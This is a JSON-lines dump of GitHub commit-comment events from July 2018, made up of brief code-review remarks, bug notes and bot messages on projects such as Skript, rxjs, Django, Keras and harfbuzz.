{"id":"7922526254","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29604814,"position":100,"line":100,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T11:08:07Z","updated_at":"2018-07-05T11:08:07Z","author_association":"CONTRIBUTOR","body":":("}},"created_at":"2018-07-05T11:08:07Z"}
{"id":"7922526348","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29604815,"position":null,"line":null,"path":null,"commit_id":"b9581ea55dc581ac41959a65def47eb9fd607838","created_at":"2018-07-05T11:08:08Z","updated_at":"2018-07-05T11:08:08Z","author_association":"OWNER","body":"Yes, a \"replicate\" plugin would be much easier to reason about."}},"created_at":"2018-07-05T11:08:08Z"}
{"id":"7922527077","type":"CommitCommentEvent","actor":{"login":"Kiran-KG"},"repo":{"name":"simoninithomas/Deep_reinforcement_learning_Course"},"payload":{"comment":{"id":29604822,"position":null,"line":null,"path":null,"commit_id":"16f8833774f8d6d0354adfa49c07d8f22d9c5f86","created_at":"2018-07-05T11:08:17Z","updated_at":"2018-07-05T11:08:17Z","author_association":"NONE","body":"The frame is a 3-dimensional array. We need to crop all three channels else it will throw an error."}},"created_at":"2018-07-05T11:08:17Z"}
{"id":"7922530886","type":"CommitCommentEvent","actor":{"login":"nibooo"},"repo":{"name":"BJ1802/A1"},"payload":{"comment":{"id":29604834,"position":null,"line":null,"path":null,"commit_id":"c5e8fd82c7802785016d9d8f577f1ff4a9901e77","created_at":"2018-07-05T11:09:09Z","updated_at":"2018-07-05T11:09:09Z","author_association":"CONTRIBUTOR","body":"666"}},"created_at":"2018-07-05T11:09:09Z"}
{"id":"7922531391","type":"CommitCommentEvent","actor":{"login":"futurejones"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29604837,"position":null,"line":null,"path":null,"commit_id":"094e5f339071fbaa7141dc7b659ffae9965723b2","created_at":"2018-07-05T11:09:16Z","updated_at":"2018-07-05T11:09:16Z","author_association":"NONE","body":"Ok, thanks.\r\nThis commit is to fix a breaking change that was pushed to the swift-4.2-branch and the stable branch only a couple of weeks ago. \r\nIt doesn't make any sense why the fix hasn't been already applied to those branches.\r\nI have contacted @cheshire about the original commit here -https://github.com/apple/swift-compiler-rt/commit/4ca89b7a97fc9d9bd8ca00e7d7bfd114d85fc29c#commitcomment-29601123\r\n"}},"created_at":"2018-07-05T11:09:16Z"}
{"id":"7922533809","type":"CommitCommentEvent","actor":{"login":"TPReal"},"repo":{"name":"ReactiveX/rxjs"},"payload":{"comment":{"id":29604845,"position":34,"line":148,"path":"src/internal/testing/TestScheduler.ts","commit_id":"2d5b3b284f6520c130f2dc0d8928fe4d7db9ee46","created_at":"2018-07-05T11:09:47Z","updated_at":"2018-07-05T11:09:47Z","author_association":"NONE","body":"This is broken, you remove from index i in the original array, but if you removed something from there already then the index changed. Let's say you have [ready1, ready2, not_ready], then this will first remove ready1 at index 0, and then not_ready at index 1, so not_ready will never be checked."}},"created_at":"2018-07-05T11:09:47Z"}
{"id":"7922534871","type":"CommitCommentEvent","actor":{"login":"dreamforceinc"},"repo":{"name":"oiad/communityLocalizations"},"payload":{"comment":{"id":29604852,"position":7,"line":1996,"path":"stringTable.xml","commit_id":"bc0610912cd9f6c4dd9749b6abf972d9f7bbdbc9","created_at":"2018-07-05T11:10:03Z","updated_at":"2018-07-05T11:10:03Z","author_association":"COLLABORATOR","body":"Я думаю что название \"ИКЕЯ\" надо оставить по-английски, потому что это название бренда.\r\nI think, the name \"IKEA\" should be left in English, because this is the brandname."}},"created_at":"2018-07-05T11:10:03Z"}
{"id":"7922535007","type":"CommitCommentEvent","actor":{"login":"annamlavanya"},"repo":{"name":"annamlavanya/Hello-Seguro"},"payload":{"comment":{"id":29604853,"position":null,"line":null,"path":null,"commit_id":"bf146b0c1c9c3f8cf46790016fd0b8028f5dfc41","created_at":"2018-07-05T11:10:05Z","updated_at":"2018-07-05T11:10:05Z","author_association":"OWNER","body":"bundle changes made"}},"created_at":"2018-07-05T11:10:05Z"}
{"id":"7922544589","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29604869,"position":null,"line":null,"path":null,"commit_id":"d33fdfc1f0f17fda838274e56cde12ecf7f7cd2c","created_at":"2018-07-05T11:12:11Z","updated_at":"2018-07-05T11:12:11Z","author_association":"COLLABORATOR","body":"NGです。\r\nテストプログラムを作成し検証してみてください。\r\n\r\nstd::cout << \"代入前　\"　<< \"変数aの値 = \" << iInputValueA << \" 変数bの値 = \" << iInputValueB << \"\\n\";\r\n a = b = 1.5;\r\nstd::cout << \"代入後　\"　<< \"変数aの値 = \" << iInputValueA << \" 変数bの値 = \" << iInputValueB << \"\\n\";\r\n\r\n見たいなのです。\r\n\r\n\r\n"}},"created_at":"2018-07-05T11:12:11Z"}
{"id":"7922549972","type":"CommitCommentEvent","actor":{"login":"eried"},"repo":{"name":"eried/ArduboyCollection"},"payload":{"comment":{"id":29604877,"position":null,"line":null,"path":null,"commit_id":"e0b8d14b9234babda844068014592687e136935f","created_at":"2018-07-05T11:13:20Z","updated_at":"2018-07-05T11:13:20Z","author_association":"OWNER","body":"🤣 I just though the header used too much space being in a new line. It does not look bad, just removes a bit of useful space."}},"created_at":"2018-07-05T11:13:20Z"}
{"id":"7922550462","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29604878,"position":100,"line":100,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T11:13:25Z","updated_at":"2018-07-05T11:13:25Z","author_association":"CONTRIBUTOR","body":"The method exists since 1.7 or older afaik, as skquery already used it. And if a new Spigot version breaks it that doesn't need that non-user friendly error? Even Spigot wouldn't remove the method unless if not moving to a new Minecraft version, it would be deprecated at most. We will see it when updating Skript to new Minecraft versions and fix it already?.. So the SUPPORTED check is unnecessary."}},"created_at":"2018-07-05T11:13:25Z"}
{"id":"7922550531","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.contenttypes"},"payload":{"comment":{"id":29604879,"position":null,"line":null,"path":null,"commit_id":"f2fb600f7a4556768333749fcc8bdfe1c74c1f00","created_at":"2018-07-05T11:13:26Z","updated_at":"2018-07-05T11:13:26Z","author_association":"NONE","body":"Markus Hilbert your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-05T11:13:26Z"}
{"id":"7922559902","type":"CommitCommentEvent","actor":{"login":"henbos"},"repo":{"name":"w3c/webrtc-pc"},"payload":{"comment":{"id":29604895,"position":14,"line":7114,"path":"webrtc.html","commit_id":"6ae910eafcbf3df624703c2a8104a0b39d6e029f","created_at":"2018-07-05T11:15:32Z","updated_at":"2018-07-05T11:15:32Z","author_association":"CONTRIBUTOR","body":"Further discussions at #1919."}},"created_at":"2018-07-05T11:15:32Z"}
{"id":"7922560394","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29604896,"position":57,"line":57,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T11:15:38Z","updated_at":"2018-07-05T11:15:38Z","author_association":"NONE","body":"Can you not replace `i < 98u ? 7u : 1u /* thats ugly af, i'm sorry*/` with `batches[j]` ?"}},"created_at":"2018-07-05T11:15:38Z"}
{"id":"7922566086","type":"CommitCommentEvent","actor":{"login":"sayan-tika"},"repo":{"name":"keras-team/keras"},"payload":{"comment":{"id":29604907,"position":6,"line":1263,"path":"keras/engine/network.py","commit_id":"3f4ccbb1966f3b14b3c98f4df45e018ac24ede13","created_at":"2018-07-05T11:16:58Z","updated_at":"2018-07-05T11:16:58Z","author_association":"NONE","body":"stupid came here to solve the typo, its this its weights only not thus. I have the same error\r\n"}},"created_at":"2018-07-05T11:16:58Z"}
{"id":"7922566540","type":"CommitCommentEvent","actor":{"login":"timgraham"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29604909,"position":59,"line":126,"path":"django/db/models/functions/math.py","commit_id":"f6f8614b8fabc8138c9bc9763841e18ba7bf55f7","created_at":"2018-07-05T11:17:04Z","updated_at":"2018-07-05T11:17:04Z","author_association":"MEMBER","body":"I don't think the link provides value here since the issue is documented and won't be fixed. On the other hand, my impression is that ATan2 might be \"fixed\" at some point so that Django's workaround isn't needed. Do you agree?"}},"created_at":"2018-07-05T11:17:04Z"}
{"id":"7922566683","type":"CommitCommentEvent","actor":{"login":"romainreignier"},"repo":{"name":"Rastafouille/BeeDetection"},"payload":{"comment":{"id":29604910,"position":null,"line":null,"path":null,"commit_id":"b077ed4eab9509971e25a123339a596b5a30ef5d","created_at":"2018-07-05T11:17:07Z","updated_at":"2018-07-05T11:17:07Z","author_association":"NONE","body":"Ah, le tracking est vraiment nécessaire ? Tu ne peux pas juste compter les blobs blancs sur une fine bande ?\r\n\r\nEt pour le pollen, c'est une seconde caméra en direction de la ruche ou c'est directement le pollen sur les abeilles ?\r\n\r\nEn tous cas, vu que tout est fourni sur git (code + videos), j'ai lancé le système, ça détecte super bien !"}},"created_at":"2018-07-05T11:17:07Z"}
{"id":"7922569506","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29604916,"position":86,"line":86,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T11:17:44Z","updated_at":"2018-07-05T11:17:44Z","author_association":"NONE","body":"you want to put a bracket between the 3 and the 100000\r\n\r\notherwise you end up with 300000 divided by something, which may give you non-multiples of 3"}},"created_at":"2018-07-05T11:17:44Z"}
{"id":"7922572679","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29604925,"position":78,"line":78,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T11:18:26Z","updated_at":"2018-07-05T11:18:26Z","author_association":"CONTRIBUTOR","body":"You forgot to split this line to multiple lines"}},"created_at":"2018-07-05T11:18:26Z"}
{"id":"7922575062","type":"CommitCommentEvent","actor":{"login":"koehnlein"},"repo":{"name":"ochorocho/joro-typo3reversedeployment"},"payload":{"comment":{"id":29604929,"position":4,"line":6,"path":"composer.json","commit_id":"44890e6bad4403e3900ca478914c94831408d184","created_at":"2018-07-05T11:18:58Z","updated_at":"2018-07-05T11:18:58Z","author_association":"CONTRIBUTOR","body":"In my opinion, it was wrong to require `helhum/typo3-console`. In my case, I have `joro/typo3reversedeployment` installed as global composer package. Through this line, typo3-console is installed globally, too. And typo3-console requires typo3/cms-... and helhum/typo3-console-plugin. And the last one causes a conflict with alternative helhum/typo3-console-plugin versions in my TYPO3 projects. :-("}},"created_at":"2018-07-05T11:18:58Z"}
{"id":"7922575696","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29604930,"position":80,"line":80,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T11:19:07Z","updated_at":"2018-07-05T11:19:07Z","author_association":"NONE","body":"DO NOT HOOK THE SAME GPU BUFFER as THE ONE YOU ARE USING FOR THE UBO\r\n\r\nYou will confuse the shit out of the driver, and it will skew the results."}},"created_at":"2018-07-05T11:19:07Z"}
{"id":"7922577841","type":"CommitCommentEvent","actor":{"login":"m1ari"},"repo":{"name":"m1ari/EverGreenCoin"},"payload":{"comment":{"id":29604937,"position":null,"line":null,"path":null,"commit_id":"6544a955d6714ed80a5605fa69b9f23c72057576","created_at":"2018-07-05T11:19:34Z","updated_at":"2018-07-05T11:19:34Z","author_association":"OWNER","body":"From further testing this might be an x86_64 vs ARM bug\r\nhttps://wiki.gentoo.org/wiki/Project:AMD64/Fixing_-fPIC_Errors_Guide#Case_4:_Linking_dynamically_against_static_archives\r\n\r\nInitial testing showed this flag needed to be added for Fedora27 and CentOs 7 (both x86_64) but not Rasbian (Arm)\r\n\r\nThe option should possibly also be -fPIC rather than -fPIE (investigating)"}},"created_at":"2018-07-05T11:19:34Z"}
{"id":"7922583158","type":"CommitCommentEvent","actor":{"login":"drott"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29604942,"position":null,"line":null,"path":null,"commit_id":"1ebaa090d80bf0b59308d2c70f5e58dd8da47450","created_at":"2018-07-05T11:20:43Z","updated_at":"2018-07-05T11:20:43Z","author_association":"COLLABORATOR","body":"\r\n0x9970e95c | (libchrome.so -hb-set-private.hh:53) | hb_set_t::page_for_insert(unsigned int)\r\n-- | -- | --\r\n  | 0x9970ec37 | (libchrome.so -hb-set-private.hh) | hb_set_t::add_range(unsigned int, unsigned int)\r\n  | 0x9970f2f1 | (libchrome.so -hb-ot-layout-common-private.hh:821) | bool OT::CoverageFormat2::add_coverage<hb_set_t>(hb_set_t*) const\r\n  | 0x997104a1 | (libchrome.so+ 0x007744a1) | OT::MarkBasePosFormat1::collect_glyphs(OT::hb_collect_glyphs_context_t*) const\r\n  | 0x99710203 | (libchrome.so -hb-ot-layout-gsubgpos-private.hh:134) | OT::hb_collect_glyphs_context_t::return_t OT::MarkBasePos::dispatch<OT::hb_collect_glyphs_context_t>(OT::hb_collect_glyphs_context_t*) const\r\n  | 0x9971014b | (libchrome.so -hb-ot-layout-common-private.hh:624) | OT::hb_collect_glyphs_context_t::return_t OT::Lookup::dispatch<OT::PosLookupSubTable, OT::hb_collect_glyphs_context_t>(OT::hb_collect_glyphs_context_t*) const\r\n  | 0x9970e6e3 | (libchrome.so -hb-ot-layout-gpos-table.hh:1490) | hb_ot_layout_lookup_collect_glyphs\r\n\r\n"}},"created_at":"2018-07-05T11:20:43Z"}
{"id":"7922585433","type":"CommitCommentEvent","actor":{"login":"alekseisasin"},"repo":{"name":"fieldOfView/PrepareStageCompactor"},"payload":{"comment":{"id":29604948,"position":null,"line":null,"path":null,"commit_id":"23d32313676ff02b0d1a2a38dbc6b755611026ea","created_at":"2018-07-05T11:21:15Z","updated_at":"2018-07-05T11:21:15Z","author_association":"NONE","body":"Hi @fieldOfView , I tested your last commit and after Cura start, I do not see changes in the sidebar."}},"created_at":"2018-07-05T11:21:15Z"}
{"id":"7922617185","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29605030,"position":null,"line":null,"path":null,"commit_id":"cdd5dd3805816a2dcd9605a7570ff50a135e6776","created_at":"2018-07-05T11:28:40Z","updated_at":"2018-07-05T11:28:40Z","author_association":"NONE","body":"Oh, I see, thanks. GL"}},"created_at":"2018-07-05T11:28:40Z"}
{"id":"7922617216","type":"CommitCommentEvent","actor":{"login":"aivve"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29605031,"position":null,"line":null,"path":null,"commit_id":"3525316116b2f33aad21e6698884a74411320e05","created_at":"2018-07-05T11:28:40Z","updated_at":"2018-07-05T11:28:40Z","author_association":"NONE","body":"no, it was stupid bug  :)"}},"created_at":"2018-07-05T11:28:40Z"}
{"id":"7922618577","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605033,"position":102,"line":102,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"21f1a16fd572f835488c5a87d2114d06411983fe","created_at":"2018-07-05T11:29:00Z","updated_at":"2018-07-05T11:29:00Z","author_association":"NONE","body":"don't memset the buffer in here, prepare it ahead of time with some random data (not null), but copy it over every frame as you do right now."}},"created_at":"2018-07-05T11:29:00Z"}
{"id":"7922620712","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29605042,"position":null,"line":null,"path":null,"commit_id":"229615f520f82ec6973be8097429128936342e7b","created_at":"2018-07-05T11:29:29Z","updated_at":"2018-07-05T11:29:29Z","author_association":"COLLABORATOR","body":"変数名の修正をお願いします。"}},"created_at":"2018-07-05T11:29:29Z"}
{"id":"7922621458","type":"CommitCommentEvent","actor":{"login":"uprel"},"repo":{"name":"uprel/gisapp"},"payload":{"comment":{"id":29605044,"position":null,"line":null,"path":null,"commit_id":"b6685037f1704c77b9a0e6ed9eec0a0491d0b34c","created_at":"2018-07-05T11:29:40Z","updated_at":"2018-07-05T11:29:40Z","author_association":"OWNER","body":"Code in map.js is related to commit 1e33d9a54c7b38d54600c78934613a5683fc9b02\r\nCode from index.php is related to commit 6f15583a1e4b5474136404dc3f4a603f9270afd8"}},"created_at":"2018-07-05T11:29:40Z"}
{"id":"7922622001","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29605045,"position":null,"line":null,"path":null,"commit_id":"3525316116b2f33aad21e6698884a74411320e05","created_at":"2018-07-05T11:29:47Z","updated_at":"2018-07-05T11:29:47Z","author_association":"NONE","body":"err ok check this https://github.com/seredat/karbowanec/pull/49\r\n\r\ni think you make double key bro"}},"created_at":"2018-07-05T11:29:47Z"}
{"id":"7922626692","type":"CommitCommentEvent","actor":{"login":"wilberforce"},"repo":{"name":"joakim/rollup-plugin-espruino"},"payload":{"comment":{"id":29605062,"position":null,"line":null,"path":null,"commit_id":"b4186f6d5c9f2d227a75ad99cd8ba39346aaa395","created_at":"2018-07-05T11:30:50Z","updated_at":"2018-07-05T11:30:50Z","author_association":"NONE","body":"Has this build been pushed to npm?"}},"created_at":"2018-07-05T11:30:50Z"}
{"id":"7922627410","type":"CommitCommentEvent","actor":{"login":"zapster"},"repo":{"name":"zapster/slack-lunchbot"},"payload":{"comment":{"id":29605063,"position":62,"line":73,"path":"README.md","commit_id":"146ae608e552bd22f33b690e867ccbe7c1058852","created_at":"2018-07-05T11:31:00Z","updated_at":"2018-07-05T11:31:00Z","author_association":"OWNER","body":"I think it is worth noting that this is 12:00 **UTC**. :-)"}},"created_at":"2018-07-05T11:31:00Z"}
{"id":"7922627973","type":"CommitCommentEvent","actor":{"login":"zapster"},"repo":{"name":"zapster/slack-lunchbot"},"payload":{"comment":{"id":29605064,"position":71,"line":82,"path":"README.md","commit_id":"146ae608e552bd22f33b690e867ccbe7c1058852","created_at":"2018-07-05T11:31:08Z","updated_at":"2018-07-05T11:31:08Z","author_association":"OWNER","body":"I'd also mention how to remove the function again. Just in case. "}},"created_at":"2018-07-05T11:31:08Z"}
{"id":"7922629028","type":"CommitCommentEvent","actor":{"login":"alexreardon"},"repo":{"name":"atlassian/react-beautiful-dnd"},"payload":{"comment":{"id":29605066,"position":4,"line":32,"path":".travis.yml","commit_id":"0625107418e1bcb4c9313f5e0dc38acdb8d9fa3c","created_at":"2018-07-05T11:31:22Z","updated_at":"2018-07-05T11:31:22Z","author_association":"CONTRIBUTOR","body":"Assuming this works, could you add a comment above this line to explain what is going down? Cheers!"}},"created_at":"2018-07-05T11:31:22Z"}
{"id":"7922630541","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29605069,"position":null,"line":null,"path":null,"commit_id":"d8a46cf418cb795eac97fc48aa86a97fd1a02975","created_at":"2018-07-05T11:31:43Z","updated_at":"2018-07-05T11:31:43Z","author_association":"COLLABORATOR","body":"修正後にビルドを掛けないでプッシュしているのですか？\r\n確認をお願いします。"}},"created_at":"2018-07-05T11:31:43Z"}
{"id":"7922632117","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29605073,"position":5,"line":62,"path":"idea/src/org/jetbrains/kotlin/idea/codeInsight/postfix/KtPostfixTemplateProvider.kt","commit_id":"d2eb3805c38f14bea707d8695f21a6d37f6b25f1","created_at":"2018-07-05T11:32:04Z","updated_at":"2018-07-05T11:32:04Z","author_association":"MEMBER","body":"I see what you mean now, thanks!"}},"created_at":"2018-07-05T11:32:04Z"}
{"id":"7922633161","type":"CommitCommentEvent","actor":{"login":"CSRaghunandan"},"repo":{"name":"manuel-uberti/.emacs.d"},"payload":{"comment":{"id":29605076,"position":null,"line":null,"path":null,"commit_id":"71cb5487a129952c1a8110d51cef665c88ef5eca","created_at":"2018-07-05T11:32:18Z","updated_at":"2018-07-05T11:32:18Z","author_association":"NONE","body":"You could replace both the above statements with `(add-to-list 'beacon-dont-blink-major-modes #'comint-mode)` and beacon will not blink for buffers which are derived from `comint-mode`.\r\n\r\nYou could also disable `beacon` on `term-mode` as any scrolling on output would cause beacon to blink which can get very annoying if you have a program generating a huge amount of output\r\n"}},"created_at":"2018-07-05T11:32:18Z"}
{"id":"7922635887","type":"CommitCommentEvent","actor":{"login":"CTCaer"},"repo":{"name":"plaidman/hekate"},"payload":{"comment":{"id":29605085,"position":null,"line":null,"path":null,"commit_id":"f73eccb2e7c463e81cfe3154b7daf10528c95c0d","created_at":"2018-07-05T11:32:58Z","updated_at":"2018-07-05T11:32:58Z","author_association":"NONE","body":"Do you have feedback on this? \r\nFor me it always worked, even in Nintendo folder, but others had problems with even the atmosphere folder."}},"created_at":"2018-07-05T11:32:58Z"}
{"id":"7922636363","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"jaraco/tempora"},"payload":{"comment":{"id":29605087,"position":1,"line":1,"path":"CHANGES.rst","commit_id":"87bd83bd8401cef6d6fc2997b87ffe8862a0665a","created_at":"2018-07-05T11:33:05Z","updated_at":"2018-07-05T11:33:05Z","author_association":"NONE","body":"Good call on the minor version bump, since you've added a dependency.\r\n\r\nHowever, we should put upper bounds in `cherrypy` to leverage the fact that you're following semantic versioning."}},"created_at":"2018-07-05T11:33:05Z"}
{"id":"7922638883","type":"CommitCommentEvent","actor":{"login":"Xi-Plus"},"repo":{"name":"Xi-Plus/twinkle"},"payload":{"comment":{"id":29605091,"position":null,"line":null,"path":null,"commit_id":"e6fa2f468c148605178ce265b7aec09f5f47e838","created_at":"2018-07-05T11:33:40Z","updated_at":"2018-07-05T11:33:40Z","author_association":"OWNER","body":"This resolves #7."}},"created_at":"2018-07-05T11:33:40Z"}
{"id":"7922639750","type":"CommitCommentEvent","actor":{"login":"Xi-Plus"},"repo":{"name":"Xi-Plus/twinkle"},"payload":{"comment":{"id":29605096,"position":null,"line":null,"path":null,"commit_id":"24dc79da641179ab47c00fb089151a7053510979","created_at":"2018-07-05T11:33:52Z","updated_at":"2018-07-05T11:33:52Z","author_association":"OWNER","body":"This resolves #7."}},"created_at":"2018-07-05T11:33:52Z"}
{"id":"7922639979","type":"CommitCommentEvent","actor":{"login":"Xi-Plus"},"repo":{"name":"Xi-Plus/twinkle"},"payload":{"comment":{"id":29605097,"position":null,"line":null,"path":null,"commit_id":"762bffa3abfff8e14a515db09023868402fb66a4","created_at":"2018-07-05T11:33:55Z","updated_at":"2018-07-05T11:33:55Z","author_association":"OWNER","body":"This resolves #7."}},"created_at":"2018-07-05T11:33:55Z"}
{"id":"7922640707","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"salesking/sepa_king"},"payload":{"comment":{"id":29605098,"position":9,"line":8,"path":"lib/sepa_king/transaction/credit_transfer_transaction.rb","commit_id":"4a1aaaa2312857216a915b95cc3f232f5492d0c7","created_at":"2018-07-05T11:34:05Z","updated_at":"2018-07-05T11:34:05Z","author_association":"NONE","body":"I ended up not using this lib, so I’m afraid I can’t justify doing that ATM with docs and tests etc, but this is how I just did it in another project if anyone else is so inclined:\n\ntoday = Date.respond_to?(:current) ? Date.current : Date.today\nOn 4 Jul 2018, 18:31 +0100, Georg Ledermann <notifications@github.com>, wrote:\n> Yes, using Date.current (if available) seems to be better. PR is welcome :)\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-05T11:34:05Z"}
{"id":"7922642175","type":"CommitCommentEvent","actor":{"login":"TheLimeGlass"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29605105,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T11:34:23Z","updated_at":"2018-07-05T11:34:23Z","author_association":"CONTRIBUTOR","body":"No where else does Skript do that, and it's built into the property expression, which this should be."}},"created_at":"2018-07-05T11:34:23Z"}
{"id":"7922642612","type":"CommitCommentEvent","actor":{"login":"PratapPuttaswamy"},"repo":{"name":"PratapPuttaswamy/RestApi"},"payload":{"comment":{"id":29605106,"position":null,"line":null,"path":null,"commit_id":"62bb468f0c849d222a7ec07d09ebf92f2921af53","created_at":"2018-07-05T11:34:29Z","updated_at":"2018-07-05T11:34:29Z","author_association":"OWNER","body":"got it\r\n"}},"created_at":"2018-07-05T11:34:29Z"}
{"id":"7922651455","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/Printernet"},"payload":{"comment":{"id":29605115,"position":null,"line":null,"path":null,"commit_id":"027d75e300895e3dcd8340fceee5d37df4fd8804","created_at":"2018-07-05T11:36:30Z","updated_at":"2018-07-05T11:36:30Z","author_association":"OWNER","body":"Seeing Printernet Community members journey with the Growing Systems of Success (GSS) canvas\r\n![image](https://user-images.githubusercontent.com/40737375/42321204-1ef2d06a-8026-11e8-860b-2f789593688f.png)\r\n"}},"created_at":"2018-07-05T11:36:30Z"}
{"id":"7922651790","type":"CommitCommentEvent","actor":{"login":"glozanoa"},"repo":{"name":"glozanoa/other"},"payload":{"comment":{"id":29605116,"position":null,"line":null,"path":null,"commit_id":"872e3298c6658dced8c1a155ae0ebaa8b0e9e6ba","created_at":"2018-07-05T11:36:35Z","updated_at":"2018-07-05T11:36:35Z","author_association":"OWNER","body":"# Probando testing en **file4.txt**\r\n"}},"created_at":"2018-07-05T11:36:35Z"}
{"id":"7922652782","type":"CommitCommentEvent","actor":{"login":"lemmy"},"repo":{"name":"tlaplus/tlaplus"},"payload":{"comment":{"id":29605118,"position":null,"line":null,"path":null,"commit_id":"13c772ff44b494d00a9dc95d429c5ec7cfb0e494","created_at":"2018-07-05T11:36:48Z","updated_at":"2018-07-05T11:36:48Z","author_association":"MEMBER","body":"![pluscalcodecompletion-13c772ff44b494d00a9dc95d429c5ec7cfb0e494](https://user-images.githubusercontent.com/88777/42321184-930decf2-8047-11e8-9f92-2447695504f8.gif)\r\n"}},"created_at":"2018-07-05T11:36:48Z"}
{"id":"7922656354","type":"CommitCommentEvent","actor":{"login":"elhams273"},"repo":{"name":"elhams273/final-project-for-course-engineering-internet"},"payload":{"comment":{"id":29605126,"position":1,"line":1,"path":"README.md","commit_id":"9dee0713c81ba1200ad6170f308be9e2545979cf","created_at":"2018-07-05T11:37:35Z","updated_at":"2018-07-05T11:37:35Z","author_association":"OWNER","body":"or push an existing repository from the command line"}},"created_at":"2018-07-05T11:37:35Z"}
{"id":"7922657739","type":"CommitCommentEvent","actor":{"login":"elhams273"},"repo":{"name":"elhams273/final-project-for-course-engineering-internet"},"payload":{"comment":{"id":29605131,"position":1,"line":1,"path":"README.md","commit_id":"9dee0713c81ba1200ad6170f308be9e2545979cf","created_at":"2018-07-05T11:37:55Z","updated_at":"2018-07-05T11:37:55Z","author_association":"OWNER","body":"or push an existing repository from the command line"}},"created_at":"2018-07-05T11:37:55Z"}
{"id":"7922660242","type":"CommitCommentEvent","actor":{"login":"denispasin"},"repo":{"name":"olivdums/THP2.0"},"payload":{"comment":{"id":29605138,"position":1,"line":1,"path":"db/migrate/20180705091508_create_posts.rb","commit_id":"280d2cdd96d2cfdc401ac768f6beb1a77908d6db","created_at":"2018-07-05T11:38:30Z","updated_at":"2018-07-05T11:38:30Z","author_association":"COLLABORATOR","body":"? On a pas besoin du modèle post. "}},"created_at":"2018-07-05T11:38:30Z"}
{"id":"7922663069","type":"CommitCommentEvent","actor":{"login":"denispasin"},"repo":{"name":"olivdums/THP2.0"},"payload":{"comment":{"id":29605142,"position":1,"line":1,"path":"app/models/post.rb","commit_id":"280d2cdd96d2cfdc401ac768f6beb1a77908d6db","created_at":"2018-07-05T11:39:09Z","updated_at":"2018-07-05T11:39:09Z","author_association":"COLLABORATOR","body":"Je pense que tu peux supprimer cette classe du coup"}},"created_at":"2018-07-05T11:39:09Z"}
{"id":"7922664629","type":"CommitCommentEvent","actor":{"login":"cartant"},"repo":{"name":"ReactiveX/rxjs"},"payload":{"comment":{"id":29605147,"position":34,"line":148,"path":"src/internal/testing/TestScheduler.ts","commit_id":"2d5b3b284f6520c130f2dc0d8928fe4d7db9ee46","created_at":"2018-07-05T11:39:30Z","updated_at":"2018-07-05T11:39:30Z","author_association":"COLLABORATOR","body":"@TPReal It would be better to open an issue for this. It's all too easy for the notification - from a comment made against an already-merged commit - to be missed."}},"created_at":"2018-07-05T11:39:30Z"}
